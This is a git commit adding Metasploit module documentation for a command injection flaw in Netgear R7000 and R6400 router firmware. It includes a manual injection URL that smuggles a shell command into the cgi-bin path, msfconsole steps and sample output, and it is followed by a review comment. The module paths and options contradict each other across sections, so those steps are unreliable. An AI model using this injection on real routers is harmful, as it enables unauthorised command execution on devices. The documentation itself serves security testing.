Start docs
parent
811f6d4d58
commit
d775c66adf
|
@ -0,0 +1,57 @@
|
||||||
|
The netgear_r7000_command_injection module exploits a command injection vulnerability in Netgear R7000 and R6400 router firmware version `1.0.7.2_1.1.93` and possibly earlier. The vulnerability is found in the `/cgi-bin/` folder of the router. A manual injection would look like so: `http://<RouterIP>/cgi-bin/;echo$IFS"cowsay"`. This will echo 'cowsay' on the router.
|
||||||
|
|
||||||
|
|
||||||
|
## Vulnerable Application
|
||||||
|
|
||||||
|
Netgear R7000 and R6400 routers running firmware version `1.0.7.2_1.1.93` and possibly earlier.
|
||||||
|
|
||||||
|
## Verification Steps
|
||||||
|
|
||||||
|
1. Start msfconsole
|
||||||
|
2. Do: `use exploit/linux/http/netgear_r7000_cgibin_exec`
|
||||||
|
3. Do: `set RHOST <RouterIP>`
|
||||||
|
4. Do: `set PAYLOAD <payload>
|
||||||
|
5. Do: `run`
|
||||||
|
6. If the router is a R7000 or R6400, the module should run
|
||||||
|
|
||||||
|
## Options
|
||||||
|
|
||||||
|
**RHOST**
|
||||||
|
|
||||||
|
This should usually be the local IP address of the vulnerable router.
|
||||||
|
|
||||||
|
**PAYLOAD**
|
||||||
|
|
||||||
|
The valid payloads are `unix cmd` payloads _only_, as this is a command execution module
|
||||||
|
|
||||||
|
## Scenarios
|
||||||
|
|
||||||
|
Sample output of what it should look like.
|
||||||
|
|
||||||
|
```
|
||||||
|
msf > use auxiliary/scanner/http/netgear_r7000_command_injection
|
||||||
|
msf auxiliary(netgear_r7000_command_injection) > options
|
||||||
|
|
||||||
|
Module options (auxiliary/scanner/http/netgear_r7000_command_injection):
|
||||||
|
|
||||||
|
Name Current Setting Required Description
|
||||||
|
---- --------------- -------- -----------
|
||||||
|
CMD yes Command line to execute
|
||||||
|
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
|
||||||
|
RHOST yes The remote target address
|
||||||
|
RPORT 80 yes The target port
|
||||||
|
SSL false no Negotiate SSL/TLS for outgoing connections
|
||||||
|
VHOST no HTTP server virtual host
|
||||||
|
|
||||||
|
msf auxiliary(netgear_r7000_command_injection) > set CMD echo "cowsay"
|
||||||
|
CMD => echo 'cowsay'
|
||||||
|
msf auxiliary(netgear_r7000_command_injection) > set RHOST 192.168.1.1
|
||||||
|
RHOST => 192.168.1.1
|
||||||
|
msf auxiliary(netgear_r7000_command_injection) > check
|
||||||
|
[*] 192.168.1.1:80 The target service is running, but could not be validated.
|
||||||
|
msf auxiliary(netgear_r7000_command_injection) > run
|
||||||
|
|
||||||
|
[*] Sending request to 192.168.1.1
|
||||||
|
[*] Auxiliary module execution completed
|
||||||
|
msf auxiliary(netgear_r7000_command_injection) >
|
||||||
|
```
|
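Review bot: The module path and options disagree across sections: Verification Steps step 2 uses `exploit/linux/http/netgear_r7000_cgibin_exec` and step 4 sets a PAYLOAD, while the intro and the Scenarios output use `auxiliary/scanner/http/netgear_r7000_command_injection` with a `CMD` option and no payload. Pick the path that matches the module this document ships with, then make the steps, the Options section (RHOST/PAYLOAD versus CMD) and the sample output agree with it. In step 4 the inline code `set PAYLOAD <payload>` is missing its closing backtick. Step 6 should state the output a reader should expect rather than "the module should run", especially since the sample `check` only reports that the target "could not be validated". In the sample, `set CMD echo "cowsay"` is echoed back as `CMD => echo 'cowsay'`; the quoting does not match, so regenerate that block from a real console session.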